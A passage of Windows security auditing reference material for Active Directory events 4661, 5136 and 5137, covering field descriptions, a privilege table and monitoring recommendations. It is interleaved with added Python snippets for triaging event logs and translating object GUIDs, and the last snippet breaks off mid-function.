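        '<Data Name="SubjectUserName">dadmin</Data>'
        '<Data Name="ObjectServer">DS</Data>'
        '<Data Name="ObjectType">%s</Data>'
        '<Data Name="ObjectName">%s</Data>'
        '<Data Name="OperationType">Object Access</Data>'
        '<Data Name="AccessMask">%s</Data>'
        "</EventData></Event>"
    ) % (keywords, object_type, object_name, access_mask)


# Constructed samples: the page's own example (DELETE on a Computer object), a failed
# WRITE_DAC attempt on AdminSDHolder, and a plain Read Property on an unwatched class.
PLACEHOLDER_CLASS = "%{00000000-0000-0000-0000-000000000000}"  # placeholder, not a real class
SAMPLE_EVENTS = [
    make_4662("%{bf967a86-0de6-11d0-a285-00aa003049e2}",
              "%{38b3d2e6-9948-4dc1-ae90-1605d5eab9a2}", "0x10000"),
    make_4662(PLACEHOLDER_CLASS, "CN=AdminSDHolder,CN=System,DC=contoso,DC=local",
              "0x40000", keywords=AUDIT_FAILURE_KEYWORDS),
    make_4662(PLACEHOLDER_CLASS, "CN=Someone,OU=Users,DC=contoso,DC=local", "0x10"),
]


def triage(events):
    """Run every event through the rules; returns (subject, reasons) for hits only."""
    hits = []
    for xml_text in events:
        fields = parse_event(xml_text)
        reasons = evaluate_4662(fields)
        if reasons:
            hits.append((fields.get("SubjectUserName"), reasons))
    return hits


if __name__ == "__main__":
    for subject, reasons in triage(SAMPLE_EVENTS):
        print(subject, "->", "; ".join(reasons))
```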
4661(S, F): A handle to an object was requested.
4/5/2019 • 12 minutes to read • Edit Online

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit Directory Service Access and Audit SAM
Event Description:
This event indicates that a handle was requested for either an Active Directory object or a Security Account Manager (SAM) object.
If access was declined, then a Failure event is generated.
This event generates only if Success auditing is enabled for the Audit Handle Manipulation subcategory.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4661</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14080</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-30T00:11:56.547696700Z" />
<EventRecordID>1048009</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="528" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x4280e</Data>
<Data Name="ObjectServer">Security Account Manager</Data>
<Data Name="ObjectType">SAM_DOMAIN</Data>
<Data Name="ObjectName">DC=contoso,DC=local</Data>
<Data Name="HandleId">0xdd64d36870</Data>
<Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="AccessList">%%5400</Data>
<Data Name="AccessMask">0x2d</Data>
<Data Name="PrivilegeList">Ā</Data>
<Data Name="Properties">-</Data>
<Data Name="RestrictedSidCount">2949165</Data>
<Data Name="ProcessId">0x9000a000d002d</Data>
<Data Name="ProcessName">{bf967a90-0de6-11d0-a285-00aa003049e2} %%5400 {ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501}</Data>
</EventData>
</Event>

Required Server Roles: For an Active Directory object, the domain controller role is required. For a SAM object,
there is no required role.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested a handle to an object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested a handle to an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security Account Manager” value for this event.
Object Type [Type = UnicodeString]: the type or class of the object that was accessed. The following list
contains possible values for this field:
SAM_ALIAS - a local group.
SAM_GROUP - a group that is not a local group.
SAM_USER - a user account.
SAM_DOMAIN - a domain. For Active Directory events, this is the typical value.
SAM_SERVER - a computer account.
Object Name [Type = UnicodeString]: the name of an object for which access was requested. Depends on
Object Type. This event can have the following format:
SAM_ALIAS – SID of the group.
SAM_GROUP - SID of the group.
SAM_USER - SID of the account.
SAM_DOMAIN – distinguished name of the accessed object.
SAM_SERVER - distinguished name of the accessed object.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate
this event with other events that might contain the same Handle ID, for example, “4662: An operation was
performed on an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested the handle. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4660(S): An object was deleted.” This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID.
These access rights depend on Object Type. See “Table 13. File access codes.” for more information about
file access rights. For information about SAM object access right use https://technet.microsoft.com/ or other
informational resources.
Access Mask [Type = HexInt32]: hexadecimal mask for the operation that was requested or performed. See
“Table 13. File access codes.” for more information about file access rights. For information about SAM
object access right use https://technet.microsoft.com/ or other informational resources.
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used
during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event,
and in that case appears as “-”. See full list of user privileges in the table below:

Privilege Name (User Right Group Policy Name): Description

SeAssignPrimaryTokenPrivilege (Replace a process-level token): Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.
SeAuditPrivilege (Generate security audits): With this privilege, the user can add entries to the security log.
SeBackupPrivilege (Back up files and directories): Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.
SeChangeNotifyPrivilege (Bypass traverse checking): Required to receive notifications of changes to files or directories. This privilege also causes the system to skip all traversal access checks. With this privilege, the user can traverse directory trees even though the user may not have permissions on the traversed directory. This privilege does not allow the user to list the contents of a directory, only to traverse directories.
SeCreateGlobalPrivilege (Create global objects): Required to create named file mapping objects in the global namespace during Terminal Services sessions.
SeCreatePagefilePrivilege (Create a pagefile): With this privilege, the user can create and change the size of a pagefile.
SeCreatePermanentPrivilege (Create permanent shared objects): Required to create a permanent object. This privilege is useful to kernel-mode components that extend the object namespace. Components that are running in kernel mode already have this privilege inherently; it is not necessary to assign them the privilege.
SeCreateSymbolicLinkPrivilege (Create symbolic links): Required to create a symbolic link.
SeCreateTokenPrivilege (Create a token object): Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.
SeDebugPrivilege (Debug programs): Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.
SeEnableDelegationPrivilege (Enable computer and user accounts to be trusted for delegation): Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.
SeImpersonatePrivilege (Impersonate a client after authentication): With this privilege, the user can impersonate other accounts.
SeIncreaseBasePriorityPrivilege (Increase scheduling priority): Required to increase the base priority of a process. With this privilege, the user can use a process with Write property access to another process to increase the execution priority assigned to the other process. A user with this privilege can change the scheduling priority of a process through the Task Manager user interface.
SeIncreaseQuotaPrivilege (Adjust memory quotas for a process): Required to increase the quota assigned to a process. With this privilege, the user can change the maximum memory that can be consumed by a process.
SeIncreaseWorkingSetPrivilege (Increase a process working set): Required to allocate more memory for applications that run in the context of users.
SeLoadDriverPrivilege (Load and unload device drivers): Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.
SeLockMemoryPrivilege (Lock pages in memory): Required to lock physical pages in memory. With this privilege, the user can use a
process to keep data in physical
memory, which prevents the system
from paging the data to virtual memory
on disk. Exercising this privilege could
significantly affect system performance
by decreasing the amount of available
random access memory (RAM).

SeMachineAccountPrivilege Add workstations to domain With this privilege, the user can create a
computer account.
This privilege is valid only on domain
controllers.

SeManageVolumePrivilege Perform volume maintenance tasks Required to run maintenance tasks on a


volume, such as remote
defragmentation.

SeProfileSingleProcessPrivilege Profile single process Required to gather profiling information


for a single process.
With this privilege, the user can use
performance monitoring tools to
monitor the performance of non-system
processes.

SeRelabelPrivilege Modify an object label Required to modify the mandatory


integrity level of an object.

SeRemoteShutdownPrivilege Force shutdown from a remote system Required to shut down a system using a
network request.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeRestorePrivilege Restore files and directories Required to perform restore operations.


This privilege causes the system to
grant all write access control to any file,
regardless of the ACL specified for the
file. Any access request other than write
is still evaluated with the ACL.
Additionally, this privilege enables you
to set any valid user or group SID as the
owner of a file. The following access
rights are granted if this privilege is
held:
WRITE_DAC
WRITE_OWNER
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_WRITE
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
DELETE
With this privilege, the user can bypass
file, directory, registry, and other
persistent objects permissions when
restoring backed up files and directories
and determines which users can set any
valid security principal as the owner of
an object.

SeSecurityPrivilege Manage auditing and security log Required to perform a number of


security-related functions, such as
controlling and viewing audit events in
security event log.
With this privilege, the user can specify
object access auditing options for
individual resources, such as files, Active
Directory objects, and registry keys.
A user with this privilege can also view
and clear the security log.

SeShutdownPrivilege Shut down the system Required to shut down a local system.

SeSyncAgentPrivilege Synchronize directory service data This privilege enables the holder to read
all objects and properties in the
directory, regardless of the protection
on the objects and properties. By
default, it is assigned to the
Administrator and LocalSystem
accounts on domain controllers.
With this privilege, the user can
synchronize all directory service data.
This is also known as Active Directory
synchronization.

SeSystemEnvironmentPrivilege Modify firmware environment values Required to modify the nonvolatile RAM
of systems that use this type of
memory to store configuration
information.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeSystemProfilePrivilege Profile system performance Required to gather profiling information


for the entire system.
With this privilege, the user can use
performance monitoring tools to
monitor the performance of system
processes.

SeSystemtimePrivilege Change the system time Required to modify the system time.
With this privilege, the user can change
the time and date on the internal clock
of the computer. Users that are assigned
this user right can affect the appearance
of event logs. If the system time is
changed, events that are logged will
reflect this new time, not the actual time
that the events occurred.

SeTakeOwnershipPrivilege Take ownership of files or other objects Required to take ownership of an object
without being granted discretionary
access. This privilege allows the owner
value to be set only to those values that
the holder may legitimately assign as
the owner of an object.
With this privilege, the user can take
ownership of any securable object in the
system, including Active Directory
objects, files and folders, printers,
registry keys, processes, and threads.

SeTcbPrivilege Act as part of the operating system This privilege identifies its holder as part
of the trusted computer base.
This user right allows a process to
impersonate any user without
authentication. The process can
therefore gain access to the same local
resources as that user.

SeTimeZonePrivilege Change the time zone Required to adjust the time zone
associated with the computer's internal
clock.

SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted Required to access Credential Manager


caller as a trusted caller.

SeUndockPrivilege Remove computer from docking station Required to undock a laptop.


With this privilege, the user can undock
a portable computer from its docking
station without logging on.

SeUnsolicitedInputPrivilege Not applicable Required to read unsolicited input from


a terminal device.

Properties [Type = UnicodeString]: depends on Object Type. This field can be empty or contain the list of
the object properties that were accessed. See more detailed information in “4661: A handle to an object was
requested” from Audit SAM subcategory.
Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only specific
Object Types.
Security Monitoring Recommendations
For 4661(S, F): A handle to an object was requested.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

You can get almost the same information from “4662: An operation was performed on an object.” There are no
additional recommendations for this event in this document.
Audit Directory Service Changes
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Directory Service Changes determines whether the operating system generates audit events when changes
are made to objects in Active Directory Domain Services (AD DS).
Auditing of directory service objects can provide information about the old and new properties of the objects that
were changed.
Audit events are generated only for objects with configured system access control lists (SACLs), and only when
they are accessed in a manner that matches their SACL settings. Some objects and properties do not cause audit
events to be generated due to settings on the object class in the schema.
This subcategory only logs events on domain controllers.
Event volume: High on domain controllers.
This subcategory triggers events when an Active Directory object was modified, created, undeleted, moved, or
deleted.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS

Domain Controller | Yes | No | Yes | No | It is important to track actions related to high value or critical Active Directory objects, for example, changes to the AdminSDHolder container or Domain Admins group objects. This subcategory shows you what actions were performed. If you want to track failed access attempts for Active Directory objects you need to take a look at the Audit Directory Service Access subcategory. For recommendations for using and analyzing the collected information, see the Security Monitoring Recommendations sections. Also, develop an Active Directory auditing policy (SACL design for specific classes, operation types which need to be monitored for specific Organizational Units, and so on) so you can audit only the access attempts that are made to specific important objects. This subcategory doesn't have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Member Server | No | No | No | No | This subcategory makes sense only on domain controllers.

Workstation | No | No | No | No | This subcategory makes sense only on domain controllers.

Events List:
5136(S): A directory service object was modified.
5137(S): A directory service object was created.
5138(S): A directory service object was undeleted.
5139(S): A directory service object was moved.
5141(S): A directory service object was deleted.
5136(S): A directory service object was modified.
4/5/2019 • 7 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Changes
Event Description:
This event generates every time an Active Directory object is modified.
To generate this event, the modified object must have an appropriate entry in its SACL: the “Write” action auditing for specific attributes.
For a change operation you will typically see two 5136 events for one action, with different Operation\Type fields: “Value Deleted” and then “Value Added”. The “Value Deleted” event typically contains the previous value and the “Value Added” event contains the new value.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-28T17:36:04.129472600Z" />
<EventRecordID>410204</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="4020" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{02647639-8626-43CE-AFE6-7AA1AD657739}</Data>
<Data Name="AppCorrelationID">-</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x32004</Data>
<Data Name="DSName">contoso.local</Data>
<Data Name="DSType">%%14676</Data>
<Data Name="ObjectDN">CN=Sergey,CN=Builtin,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{4FE80A66-5F93-4F73-B215-68678058E613}</Data>
<Data Name="ObjectClass">user</Data>
<Data Name="AttributeLDAPDisplayName">userAccountControl</Data>
<Data Name="AttributeSyntaxOID">2.5.5.9</Data>
<Data Name="AttributeValue">512</Data>
<Data Name="OperationType">%%14675</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “modify object” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “modify object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Directory Service:
Name [Type = UnicodeString]: the name of the Active Directory domain where the modified object is
located.
Type [Type = UnicodeString]: has “Active Directory Domain Services” value for this event.
Object:
DN [Type = UnicodeString]: distinguished name of the object that was modified.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

GUID [Type = GUID]: each Active Directory object has a globally unique identifier (GUID), which is a 128-bit
value that is unique not only in the enterprise but also across the world. GUIDs are assigned to every object
created by Active Directory. Each object's GUID is stored in its Object-GUID (objectGUID) property.
Active Directory uses GUIDs internally to identify objects. For example, the GUID is one of an object's
properties that is published in the global catalog. Searching the global catalog for a User object's GUID will
yield results if the user has an account somewhere in the enterprise. In fact, searching for any object by
Object-GUID might be the most reliable way of finding the object you want to find. The values of other
object properties can change, but the Object-GUID never changes. When an object is assigned a GUID, it
keeps that value for life.
Event Viewer automatically resolves GUID field to real object.
To translate this GUID, use the following procedure:
Perform the following LDAP search using the LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(objectGUID=GUID))
Perform the following operations with the GUID before using it in a search request:
We have this GUID to search for: a6b34ab5-551b-4626-b8ee-2b36b3ee6672
Take the first 3 sections: a6b34ab5-551b-4626.
For each of these 3 sections, invert the order of the bytes, like this: b54ab3a6-1b55-2646
Add the last 2 sections without transformation: b54ab3a6-1b55-2646-b8ee-2b36b3ee6672
Delete the dashes: b54ab3a61b552646b8ee2b36b3ee6672
Divide the bytes with backslashes: \b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
Filter example: (&(objectClass=*)(objectGUID=\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Attributes: objectGUID
Class [Type = UnicodeString]: class of the object that was modified. Some of the common Active Directory
object classes:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of this field open Active Directory Schema snap-in (see how to enable this
snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Attribute:
LDAP Display Name [Type = UnicodeString]: the object attribute that was modified.

Note LDAP Display Name is the name used by LDAP clients, such as the ADSI LDAP provider, to read and
write the attribute by using the LDAP protocol.

Syntax (OID) [Type = UnicodeString]: The syntax for an attribute defines the storage representation, byte
ordering, and matching rules for comparisons of property types. Whether the attribute value must be a string, a
number, or a unit of time is also defined. Every attribute of every object is associated with exactly one syntax.
The syntaxes are not represented as objects in the schema, but they are programmed to be understood by
Active Directory. The allowable syntaxes in Active Directory are predefined.

OID | SYNTAX NAME | DESCRIPTION

2.5.5.0 | Undefined | Not a legal syntax.

2.5.5.1 | Object(DN-DN) | The fully qualified name of an object in the directory.

2.5.5.2 | String(Object-Identifier) | The object identifier.

2.5.5.3 | Case-Sensitive String | General String. Differentiates uppercase and lowercase.

2.5.5.4 | CaseIgnoreString(Teletex) | Teletex. Does not differentiate uppercase and lowercase.

2.5.5.5 | String(Printable), String(IA5) | Printable string or IA5-String. Both character sets are case-sensitive.

2.5.5.6 | String(Numeric) | A sequence of digits.

2.5.5.7 | Object(DN-Binary) | A distinguished name plus a binary large object.

2.5.5.8 | Boolean | TRUE or FALSE values.

2.5.5.9 | Integer, Enumeration | A 32-bit number or enumeration.

2.5.5.10 | String(Octet) | A string of bytes.

2.5.5.11 | String(UTC-Time), String(Generalized-Time) | UTC Time or Generalized-Time.

2.5.5.12 | String(Unicode) | Unicode string.

2.5.5.13 | Object(Presentation-Address) | Presentation address.

2.5.5.14 | Object(DN-String) | A DN-String plus a Unicode string.

2.5.5.15 | String(NT-Sec-Desc) | A Microsoft® Windows NT® Security descriptor.

2.5.5.16 | LargeInteger | A 64-bit number.

2.5.5.17 | String(Sid) | Security identifier (SID).

Table 10. LDAP Attribute Syntax OIDs.

Value [Type = UnicodeString]: the value which was added or deleted, depending on the Operation\Type field.
Operation:
Type [Type = UnicodeString]: type of performed operation.
Value Added – new value added.
Value Deleted – value deleted (typically “Value Deleted” is a part of change operation).
Correlation ID [Type = GUID]: multiple modifications are often executed as one operation via LDAP. This
value allows you to correlate all the modification events that comprise the operation. Just look for other events
from current subcategory with the same Correlation ID, for example “5137: A directory service object was
created.” and “5139: A directory service object was moved.”

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Application Correlation ID [Type = UnicodeString]: always has “-” value. Not in use.

Security Monitoring Recommendations
For 5136(S): A directory service object was modified.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor modifications to specific Active Directory objects, monitor for DN field with specific
object name. For example, we recommend that you monitor all modifications to
“CN=AdminSDHolder,CN=System,DC=domain,DC=com” object.
If you need to monitor modifications to specific Active Directory classes, monitor for Class field with specific
class name. For example, we recommend that you monitor all modifications to domainDNS class.
If you need to monitor modifications to specific Active Directory attributes, monitor for LDAP Display
Name field with specific attribute name.
It is better to monitor Operation\Type = Value Added events, because you will see the new value of
attribute. At the same time you can correlate to previous Operation\Type = Value Deleted event with the
same Correlation ID to see the previous value.
5137(S): A directory service object was created.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Changes
Event Description:
This event generates every time an Active Directory object is created.
This event only generates if the parent object has a particular entry in its SACL: the “Create” action, auditing for specific classes or objects. An example is the “Create Computer objects” action auditing for the organizational unit.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5137</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-28T18:36:26.048167500Z" />
<EventRecordID>410737</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="3156" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{4EAD68FF-7229-42A4-8C73-AAB57169858B}</Data>
<Data Name="AppCorrelationID">-</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x32004</Data>
<Data Name="DSName">contoso.local</Data>
<Data Name="DSType">%%14676</Data>
<Data Name="ObjectDN">cn=Win2000,CN=Users,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{41D5F7AF-64A2-4985-9A4B-70DAAFC7CCE6}</Data>
<Data Name="ObjectClass">computer</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “create object” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where new object is created.
Type [Type = UnicodeString]: has “Active Directory Domain Services” value for this event.
Object:
DN [Type = UnicodeString]: distinguished name of the object that was created.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

GUID [Type = GUID]: each Active Directory object has a globally unique identifier (GUID), which is a 128-bit
value that is unique not only in the enterprise but also across the world. GUIDs are assigned to every object
created by Active Directory. Each object's GUID is stored in its Object-GUID (objectGUID) property.
Active Directory uses GUIDs internally to identify objects. For example, the GUID is one of an object's
properties that is published in the global catalog. Searching the global catalog for a User object's GUID will
yield results if the user has an account somewhere in the enterprise. In fact, searching for any object by
Object-GUID might be the most reliable way of finding the object you want to find. The values of other
object properties can change, but the Object-GUID never changes. When an object is assigned a GUID, it
keeps that value for life.
Event Viewer automatically resolves GUID field to real object.
To translate this GUID, use the following procedure:
Perform the following LDAP search using the LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(objectGUID=GUID))
Perform the following operations with the GUID before using it in a search request:
We have this GUID to search for: a6b34ab5-551b-4626-b8ee-2b36b3ee6672
Take the first 3 sections: a6b34ab5-551b-4626.
For each of these 3 sections, invert the order of the bytes, like this: b54ab3a6-1b55-2646
Add the last 2 sections without transformation: b54ab3a6-1b55-2646-b8ee-2b36b3ee6672
Delete the dashes: b54ab3a61b552646b8ee2b36b3ee6672
Divide the bytes with backslashes: \b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
Filter example: (&(objectClass=*)(objectGUID=\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Attributes: objectGUID
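The byte-swapping procedure above (given for both 5136 and 5137) as an added Python example; it is not Microsoft's code and not part of the page. It starts from the GUID in the text, derives the LDP.exe filter both via the standard library's little-endian layout and by following the page's steps literally, and also decodes a raw objectGUID value back to its display form.

```python
"""Translate an objectGUID between display form and the byte-escaped LDAP
filter form that LDP.exe expects (added example, not from the page)."""
import uuid

# GUID taken from the page's worked example.
PAGE_GUID = "a6b34ab5-551b-4626-b8ee-2b36b3ee6672"


def guid_to_ldap_bytes(guid_text: str) -> str:
    """Return the objectGUID as \\xx escapes, one per stored byte.

    Active Directory stores the GUID in "mixed-endian" layout: the first
    three groups are byte-reversed, the last two stay as printed.
    uuid.UUID(...).bytes_le yields exactly that layout, so no manual
    reversal is needed. Braces around the GUID (Event Viewer style) are
    accepted by uuid.UUID.
    """
    raw = uuid.UUID(guid_text).bytes_le
    return "".join(f"\\{b:02x}" for b in raw)


def guid_to_ldap_bytes_manual(guid_text: str) -> str:
    """Same result, following the page's steps one by one (for checking)."""
    parts = guid_text.lower().split("-")
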